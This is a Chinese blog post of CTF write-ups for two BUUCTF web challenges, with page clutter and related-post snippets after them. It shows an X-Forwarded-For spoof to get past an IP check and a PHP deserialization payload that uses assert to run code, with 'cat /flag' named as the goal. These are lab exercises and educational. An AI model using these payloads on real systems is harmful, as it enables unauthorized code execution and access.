BUUCTF Web [MRCTF2020]PYWebsite1 & [NPUCTF2020]ReadlezPHP1

已于 2022-12-08 11:51:02 修改
阅读量589 收藏 1
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-11-17 23:10:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/127913379
版权

目录

[MRCTF2020]PYWebsite1

[NPUCTF2020]ReadlezPHP1

[MRCTF2020]PYWebsite1

启动靶机

 根据网页提示,我们需要点击BUY IT NOW,支付后,会得到授权码,在下方输入即可得到flag。

右键查看网页源代码

通过js代码可以发现,前端判断通过授权码后会跳转到./flag.php。直接访问flag.php

有校验,通过网页信息得知后端会判断ip是不是购买者,页面提示只有购买者和自己可以看到flag,其他购买者的ip猜不到,但我们可以伪造本地ip。

X-Forwarded-For:127.0.0.1

刷新此页面,并抓包,添加一行  X-Forwarded-For:127.0.0.1

 拿到flag             flag{a72cbd57-68e9-4aef-8a6c-56c735dab584}

[NPUCTF2020]ReadlezPHP1

启动靶机

 一个报时页面,刷新页面,下面的时间也会刷新,f12查看报时部分代码

发现了一个链接,直接访问

 

代码审计,反序列化。

重点是这一行,如果b是system,a是cat /flag 那么就会执行system('cat /flag'),尝试构造命令:

打开php在线运行,执行序列化代码。

<?php  
class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";       //这里system被过滤了
}

$a = serialize(new HelloPhp);
echo $a;
?>

 构造payload:

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

ctrl+f   搜索flag         flag{a6a5a5db-ea36-4d8a-a7d8-342853f58d8b}

WmVicmE=
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
BUUCTF部分web题目
最新发布
05-06
写题记录
[MRCTF2020]PYWebsite 1
weixin_53150482的博客
07-20 349
[MRCTF2020]PYWebsite 1
[MRCTF2020]PYWebsite
LYJ20010728的博客
06-11 223
[MRCTF2020]PYWebsite考点思路Payload 考点 X-Forwarded-For 思路 进入题目环境,题目描述是需要授权码才能够买flag,随便尝试一下发现没啥思路,F12查看一下,发现存在JavaScript代码提示 由于其为前端代码,所以我们直接访问 ./flag.php即可 文字提示其已经将够买flag人的IP保存了,尝试X-Forwarded-For进行伪造,发包得到flag Payload JavaScript代码提示 function enc(cod
BUUCTF [MRCTF2020] PYWebsite
Senimo
01-05 518
[MRCTF2020]PYWebsite 考点: 1. 启动环境: 提示需要购买flag,首先对题目进行信息收集,查看网页源码时,发现: &lt;script&gt; function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (c
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
BUUCTFweb之强网杯2019随便注
12-14
1&rsquo; : 报错 1&rsquo; #:回显正常 1&rsquo; order by 1 #: 正常(经测试列数为2&ndash;此处小白暗自窃喜) 1&rsquo; union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1&rsquo;;show databases;# ...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf-[MRCTF2020]PYWebsite(小宇特详解)
小宇的web博客
03-09 6246
buuctf-[MRCTF2020]PYWebsite(小宇特详解) 1.先看一下题目,这里说flag需要购买,先尝试去购买。 2.购买页面 我在这里实在没有忍住,我去扫描了一下,果然不是这种办法去实现。 这里我用了QR Research去扫描这个二维码 果然突破口不在这里 3.他说是从页面代码入手,这里去开始的页面去查看一下源代码 function enc(code){ hash = hex_md5(code); return hash; }
BUUCTF之[MRCTF2020]PYWebsite
weixin_44632787的博客
06-22 187
BUUCTF之[MRCTF2020]PYWebsite 知识点 X-Forwarded-For client-ip 题目 先用BurpSuite抓包 用X-Forwarded-For来改一下IP地址
buuctf-[MRCTF2020]PYWebsite
2202_75317918的博客
09-19 457
buuctf-[MRCTF2020]PYWebsite
web buuctf [MRCTF2020]PYWebsite
weixin_44214568的博客
04-07 2358
知识点:XFF漏洞 1.查看源代码 存在flag.php文件,放入url中查看 2.和ip有关,后端验证 抓包,添加X-Forwarded-For=127.0.0.1,伪装访问ip为本地主机 flag{99bd7d0f-62f2-4631-b688-31433132a466}
BUUCTF WEB PYWebsite1
qq_41696858的博客
12-28 458
这题没啥好说的,经典买flag,在页面源码里找到了个这 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829d
[BUUCTF][MRCTF2020]部分web wp
cosmoslin的博客
10-11 711
[MRCTF2020]你传你????呢 学习链接:[CTF].htaccess的使用技巧总结 fuzz测试,发现过滤了php后缀,中间件是apache,可以上传png图片马。 思路:利用.htaccess来将png文件当作php文件解析 先上传.htaccess文件,文件解析 AddType application/x-httpd-php .png 然后再上传一个png图片马 最后用蚁剑连接就可以啦! [MRCTF2020]Ez_bypass include 'flag.php'; $flag='MR
BUUCTF [MRCTF2020]PYWebsite
Chu_Jian_Xiong的博客
10-16 335
[MRCTF2020]PYWebsite 记录一次刷题,不是因为有什么技巧,而是因为简单到令人意外。 一顿分析源码什么的一顿瞎搞 目录一扫直接就出flag.php了,访问一下 抓包看看 没什么特别的,加个X-Forwarded-For: 127.0.0.1看看 flag{2323496f-10f1-45b1-ae61-1a56bf906fca} 就扫个目录改个包就出来了,很离谱… ...
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. Please submit the flags to get your points! 解题思路: 这道题目是一个较为简单的misc题目,我们需要在给定的文本中找到flag,每个flag对应一个问题。比如说,第一个flag对应的问题是: What is the capital of China? 在文本中找到答案&quot;Beijing&quot;即可得到对应的flag。 其他的问题和答案大概率也可以在文本中找到,需要稍微仔细一些,比如有一些问题是需要计算的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值